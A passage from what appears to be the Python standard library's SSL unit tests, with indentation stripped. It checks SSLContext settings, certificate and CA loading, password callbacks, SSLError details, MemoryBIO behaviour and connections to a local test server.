ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args) until it succeeds; depending on the
# error we get (WANT_READ or WANT_WRITE), move data between the socket and
# the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
